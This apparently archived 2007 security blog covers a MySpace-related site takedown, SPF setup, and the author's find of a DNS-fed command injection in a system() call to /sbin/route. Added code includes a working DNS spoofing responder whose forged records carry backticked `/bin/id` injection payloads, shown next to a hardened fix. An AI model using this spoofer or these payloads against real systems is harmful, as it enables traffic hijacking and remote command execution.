Friday, January 26, 2007

MySpace, GoDaddy, nmap and snails

I woke up a bit early this morning and began my usual routine of feeding while I checked email, read various news bits, etc. I ran into an article on reddit about GoDaddy having to shut down a site after myspace.com complained. This alone didn't catch my attention as this sort of thing happens probably hundreds of times per day.

As the caffeine started to flow, I read further into the article. I saw that the site that got shut down was seclists.org. That site rang a bell. I read further and realized that seclists is owned by Fyodor, the author of nmap, which is arguably one of the most important utilities in a security geek's arsenal. I nearly choked on my granola when everything finally clicked.

I don't use GoDaddy, but it made me realize that I should probably avoid GoDaddy in the future, and that many people in similarly edgy shoes will probably do the same.

What gets me most about this whole fiasco is not the fact that MySpace can throw its weight around and get a site axed, nor the fact that it happened to a fairly well-known individual. It's the fact that the data in question was first made public on another site over a week ago. My cat, who is barely 10 months old, has ADHD, is a vicious killer, and knows nothing other than how to sleep, eat, shit, cause trouble and get attention, could've addressed a security issue like this quicker than MySpace did. We aren't talking about a few passwords here, either. We are talking about over 56,000 myspace credentials and a password-stealing scheme that was extremely effective.

The security staff (if any :P) at myspace should be ashamed.

Monday, January 15, 2007

Dropped mail?

I figured I'd throw this out there hoping that some of the 3.4 people that read this blog may have some insight.

I've owned the spoofed.org domain since 2001. While I can't guarantee it, I have every reason to believe that the machine(s) used to host it have never been involved in any sort of mass-mailing, virus spewing, or other things that tend to cause mail to get dropped.

Over the past, oh... 6 months, I've seen a number of instances where mail coming from spoofed.org has been dropped for one reason or another. In some cases, my email was in reply to one that someone else sent. When they never got my response, they asked why, but I've got logs saying that the email was successfully delivered. In some cases (yahoo.com and hotmail.com being good examples), mail would get delivered successfully but dropped in a spam folder, which in the end means it'll go unread and eventually be deleted. In other cases, I'd initiate or respond to an email and never get a response but I know the person on the other end would've responded had they received my email.

Like anyone that's ever posted to a public mailing list, my email address(es) and domain have been used plenty of times as part of forged spam or other nastiness. That's a risk I accept, as really it's just life on the Internet. But I can't help but wonder why my mail gets treated like garbage and all too often dropped.

I know at one point yahoo.com and hotmail.com were making heavy use of SPF, so I recently configured an SPF record for spoofed.org:

$  host -t txt spoofed.org
spoofed.org          TXT "v=spf1 a mx  ptr -all"
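As an added example (not part of the original post and not the author's setup), here is a small evaluator for the mechanisms in that record, the way a receiving MTA would apply it to a connecting IP. It runs against constructed zone data so it works offline; the addresses and the mail.spoofed.org / relay.spoofed.org names are assumptions, not the real spoofed.org records. It handles a, mx, ip4, ptr and all with their qualifiers and ignores include/redirect and CIDR suffixes. One caveat a practitioner would want: SPF checks only the envelope sender (MAIL FROM) and HELO identity, so a forged From: header is not caught, and RFC 7208 (which postdates this post) says the ptr mechanism SHOULD NOT be used because it is slow and unreliable; a and mx already cover the hosts that legitimately send for the domain.

```python
import ipaddress

# Constructed zone data standing in for DNS, so the example runs offline.
# The TXT record is the one from the post; everything else is assumed.
ZONE = {
    ("spoofed.org", "TXT"): ["v=spf1 a mx  ptr -all"],
    ("spoofed.org", "A"): ["192.0.2.10"],
    ("spoofed.org", "MX"): ["mail.spoofed.org"],
    ("mail.spoofed.org", "A"): ["192.0.2.25"],
    ("relay.spoofed.org", "A"): ["203.0.113.5"],
    ("10.2.0.192.in-addr.arpa", "PTR"): ["spoofed.org"],
    ("25.2.0.192.in-addr.arpa", "PTR"): ["mail.spoofed.org"],
    ("5.113.0.203.in-addr.arpa", "PTR"): ["relay.spoofed.org"],
}

def lookup(name, rtype):
    """Stand-in for a DNS query: returns a list of record values."""
    return ZONE.get((name, rtype), [])

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

def check_host(ip, domain, lookup=lookup):
    """Evaluate the SPF record of `domain` for connecting address `ip`.

    Supports a, mx, ip4, ptr and all (no include/redirect, no CIDR suffixes).
    Returns one of: none, pass, fail, softfail, neutral, permerror.
    """
    records = [t for t in lookup(domain, "TXT") if t.startswith("v=spf1 ")]
    if not records:
        return "none"
    if len(records) > 1:
        return "permerror"          # RFC 7208: multiple records are an error
    addr = ipaddress.ip_address(ip)
    for term in records[0].split()[1:]:   # split() also absorbs the double space
        qual = "+"
        if term[0] in QUALIFIERS:
            qual, term = term[0], term[1:]
        mech, _, arg = term.lower().partition(":")
        if mech == "all":
            matched = True
        elif mech == "ip4":
            matched = addr in ipaddress.ip_network(arg, strict=False)
        elif mech == "a":
            matched = ip in lookup(arg or domain, "A")
        elif mech == "mx":
            matched = any(ip in lookup(mx, "A") for mx in lookup(arg or domain, "MX"))
        elif mech == "ptr":
            # Reverse-map ip, then keep only names that resolve back to ip and
            # are the target domain or a subdomain of it (validated reverse DNS).
            target = arg or domain
            matched = any((n == target or n.endswith("." + target))
                          and ip in lookup(n, "A")
                          for n in lookup(addr.reverse_pointer, "PTR"))
        else:
            return "permerror"      # unsupported mechanism in this evaluator
        if matched:
            return QUALIFIERS[qual]
    return "neutral"                # nothing matched and no 'all' term
```

With this data, 192.0.2.10 passes via a, 192.0.2.25 via mx, 203.0.113.5 only via ptr, and any other address hits -all and fails, which is exactly what you want a receiver to conclude about the forged spam carrying your domain.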

If anyone has any suggestions for things I could do (or not do...) to prevent my mail from getting dropped or otherwise demoted, please leave a comment here. Feel free to poke around, too. Examine my DNS setup and my postfix configuration. I believe it all to be sane, but I could be wrong and would love to have that proven.

Thanks in advance!

Tuesday, January 2, 2007

Can't see the forest for the trees

Yesterday was perhaps the laziest day I've had in quite some time, but it was worth it. I woke up at 10ish and spent the remainder of the day planted in front of my laptop hacking. Come midnight I realized that the ROI on my time was diminishing.

My challenge for the day was much like many of the other security adventures I've been on in the past few years -- something catches my eye, and I pursue it. This particular trait has proven quite useful in my pursuit of security success, but it is actually one that I acquired long before I even owned my own computer -- and I mean "own" as in "it belongs to me", not "0wn". Growing up I spent the bulk of my time outdoors doing various things -- riding my bikes, camping, fishing, hiking, etc. For whatever reason, I had this ability to, without even trying, discover misplaced/lost belongings. As an example, on camping trips with the scouts, I'd routinely be walking along, doing whatever needed to be done at the time, and I'd see a silhouette or something that otherwise stood out ever so slightly. It would usually turn out to be a watch, a flashlight, or other outdoor goody. Eventually it got to the point that other people would actually suspect I was stealing these things or they'd get pissed off at me because I would always find these treasures that would've otherwise gone unnoticed.

Yesterday's challenge was something that I had casually noticed in a packet capture several days earlier -- a DNS request for the hostname 'netmask'.

The first several hours were spent verifying that the request had, in fact, come from the application I thought it came from, and then determining what, in particular, had made that request. Eventually I realized that what I was up against was a call to system("/sbin/route somestuffhere"), where somestuffhere was taken in part from a DNS response.

After a quick POC with Dug Song's dnsspoof, I knew I could manipulate that call, but dnsspoof only does simple A record responses, so all I could wind up doing was getting /sbin/route to do something funky with this particular call. While that is certainly a vulnerability all by itself, it wasn't quite what I was looking for. It's like fishing -- it was a nice catch, but there is something bigger/better out there. I debated hacking up dnsspoof to do my bidding, but that quickly proved to be more C than I had time for. I whipped up some perl that did exactly what dnsspoof did, and then modified it to do my bidding. It will respond to regex-matched DNS A record lookups with arbitrary records -- A, CNAME, MX, etc, that you define. Doing an nslookup on google.com and getting back a TXT record of `/bin/id` is quite amusing.
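The trick described above, as an added Python illustration rather than the author's perl tool: a minimal RFC 1035 wire-format builder/parser, a rule table that maps a regex on the queried name to an arbitrary record type and data, and a responder that answers an A query with whatever the rule says. The tail end shows the bug class the post found: the resolved text spliced into a route command string versus passing it as a validated argv with no shell. The regexes, the attacker.invalid name, the route arguments and the function names are assumptions for the example, not code from the post.

```python
import re
import struct

# Added illustration, not the post's perl code. Rules, names and the route
# arguments below are assumptions made for the example.
QTYPE_A, QTYPE_CNAME, QTYPE_TXT = 1, 5, 16

def encode_name(name):
    """Dotted name -> DNS wire labels (length-prefixed, each at most 63 bytes)."""
    out = b""
    for label in name.split("."):
        raw = label.encode("latin-1")
        if not 0 < len(raw) < 64:
            raise ValueError("bad label length")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"

def decode_name(msg, off):
    """Wire labels (with RFC 1035 compression pointers) -> (name, next offset)."""
    labels = []
    while True:
        ln = msg[off]
        if ln == 0:
            return ".".join(labels), off + 1
        if ln & 0xC0 == 0xC0:
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            labels.append(decode_name(msg, ptr)[0])
            return ".".join(labels), off + 2
        labels.append(msg[off + 1:off + 1 + ln].decode("latin-1"))
        off += 1 + ln

def build_query(qname, qtype=QTYPE_A, txid=0x1234):
    """Standard recursive query: header plus one question, class IN."""
    hdr = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return hdr + encode_name(qname) + struct.pack("!HH", qtype, 1)

# (regex on the queried name, record type to answer with, record data).
# The client asked for an A record; it gets back the rule's type and data.
RULES = [
    (re.compile(r"\.example\.com$"), QTYPE_CNAME, "`/bin/id`.attacker.invalid"),
    (re.compile(r"^google\.com$"), QTYPE_TXT, "`/bin/id`"),
]

def spoof_response(query, rules=RULES):
    """Answer a rule-matched query with the rule's record; None if not a target."""
    txid = struct.unpack("!H", query[:2])[0]
    qname, off = decode_name(query, 12)
    question = query[12:off + 4]            # name + qtype + qclass, echoed back
    for pattern, rtype, rdata in rules:
        if pattern.search(qname):
            break
    else:
        return None
    if rtype == QTYPE_A:
        rd = bytes(int(o) for o in rdata.split("."))
    elif rtype == QTYPE_CNAME:
        rd = encode_name(rdata)
    else:                                   # TXT: one <len><chars> string
        raw = rdata.encode("latin-1")
        rd = bytes([len(raw)]) + raw
    hdr = struct.pack("!HHHHHH", txid, 0x8580, 1, 1, 0, 0)   # QR|AA|RD|RA, 1 answer
    rr = encode_name(qname) + struct.pack("!HHIH", rtype, 1, 60, len(rd)) + rd
    return hdr + question + rr

def parse_first_answer(pkt):
    """Return (owner, rtype, value) for the first answer RR of a response."""
    qd = struct.unpack("!H", pkt[4:6])[0]
    off = 12
    for _ in range(qd):
        off = decode_name(pkt, off)[1] + 4
    owner, off = decode_name(pkt, off)
    rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    rd = pkt[off:off + rdlen]
    if rtype == QTYPE_CNAME:
        value = decode_name(pkt, off)[0]
    elif rtype == QTYPE_TXT:
        value = rd[1:1 + rd[0]].decode("latin-1")
    else:
        value = ".".join(str(b) for b in rd)
    return owner, rtype, value

def unsafe_route_command(resolved):
    """The bug class in the post: DNS-derived text spliced into a shell string."""
    return "/sbin/route add -host " + resolved + " gw 10.0.0.1"   # assumed arguments

def safe_route_argv(resolved):
    """Hardened form: accept only hostname/IP characters, then exec an argv, no shell."""
    if not re.fullmatch(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?", resolved):
        raise ValueError("DNS answer is not a valid hostname: %r" % resolved)
    return ["/sbin/route", "add", "-host", resolved, "gw", "10.0.0.1"]
```

Feeding spoof_response(build_query("www.example.com")) through parse_first_answer yields a CNAME of `/bin/id`.attacker.invalid; a program that passes that straight to system() runs the backticked command. The argv form never gives the shell a chance to interpret it, and the character whitelist rejects the answer outright.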

Anyway, I'm finalizing this code and hope to make it available very soon.

Happy 0x7d7

So, rumor has it that it is now the year twenty o-seven. Personally, I'm still not even sure Christmas happened, because I know that I spent all of yesterday in just shorts and the heat wasn't on, and on what was supposedly the last day of 2006, I rode my bike outside and sweat my ass off. On the East Coast, that just doesn't happen.

A funny thing happened at work today. I was filling out paperwork for vacation and mistakenly put today as 1/2/2006, and all of my other dates were also off by one year. This sort of thing happens to just about everyone at least once this time of year. In thinking about why it happens, I realized that a large part of this is due to the fact that in today's society, you rarely actually write the date down. At least 75% of the time it's just automatically entered for you -- email, calendars, etc. Plus, when you actually need to know what today's date is, how often do you actually think it out instead of asking someone/something for the answer? In the computer world, the date is automatically printed in my zsh prompt, and if I need to know a specific date, cal tells me the rest. In the real world, say at the grocery store, you always ask the cashier what the date is.

Anyway, here's hoping 2007 is as eventfully uneventful as 2006.